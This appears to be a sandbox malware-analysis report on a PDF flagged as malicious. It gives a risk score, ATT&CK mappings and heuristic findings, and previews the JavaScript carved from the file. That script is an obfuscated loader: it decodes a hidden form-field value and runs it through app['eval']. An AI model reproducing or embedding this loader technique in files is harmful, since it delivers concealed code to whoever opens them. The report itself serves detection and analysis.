SUSPICIOUS
48
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1204.002 Malicious File
The PDF file was flagged as malicious by an ML classifier with high confidence. Heuristics indicate the presence of embedded JavaScript, which is often used to exploit vulnerabilities or download secondary payloads. No specific family could be identified, but the presence of JavaScript suggests a delivery mechanism for further malicious activity.
Machine Learning
- Nyx PDF Classifier malicious score 0.9977
Heuristics 3
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0106_000.js |
pdf-javascript-stream | PDF /JS object 106 at offset 0x4CEB | 1292 bytes |
SHA-256: 9c224de20cfb4d64ac142e0732375db93a9c2405cfa8161eed1601ac21996c0f |
|||
Preview scriptFirst 1,000 lines of the extracted script
var hjgklsfoire34o = "fghijk";
var reg34e34rfrew = ':ABCD'+'EFG';
var ewr32r23wre = 'QRS'+'TU'+'VWXYZ{'+'}';
var rere3ew2r23w = "()[]^"+"abc"+"de";
var ewrwr23wrewf = 'pqrstuvw';
var ert4t3ret = '45678';
var werr3r2wr3er = '"=<>&\\';
function xbdg54eg(rg34ge){
var gargeggr="";
var r3gferg = 36;
for (var i = 0;i<rg34ge.length-(15-14);i++)
{var cxnerg4feeswf = rg34ge[i];
var reg4ewtfews=xczr4etw4e.indexOf(cxnerg4feeswf)-r3gferg;
var rwghoeregregr= reg4ewtfews+xczr4etw4e.length;
if (reg4ewtfews<(10-10)){reg4ewtfews=rwghoeregregr}
gargeggr += xczr4etw4e.charAt(reg4ewtfews)}
return gargeggr;}
var dsfvcwt4es = '9/!%+-*.,;';
var esdrzw4ry = hjgklsfoire34o+"lmno"+ewrwr23wrewf+'x'+'yz_0123'+ert4t3ret+dsfvcwt4es+werr3r2wr3er;
var nmxcbver4t = ewr32r23wre+' '+rere3ew2r23w+esdrzw4ry;
var xcvzwt4ert4t = reg34e34rfrew +'HIJKLMNOP';
var edrrrt4fw4re = xcvzwt4ert4t+nmxcbver4t;
var xczr4etw4e =edrrrt4fw4re;
var erg4wtgeg=getField("WSWSWS");
var ewfwr34fw4e=erg4wtgeg.value;
var xcvbretyg43e = xbdg54eg(ewfwr34fw4e);
var xbv4tter4t = "hauaiyh9iryh98wyf98awyf89sdayfp89aewyf89wey9wev"+"alrgwrgqr3ewgergvaebgegaehergg";
var dfhja78r278fdsa78tffdfssdf78dasf678as87dasf78d6fs78dfas7d7dt78 = xbv4tter4t.substr(45,4);
app[dfhja78r278fdsa78tffdfssdf78dasf678as87dasf78d6fs78dfas7d7dt78](xcvbretyg43e);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.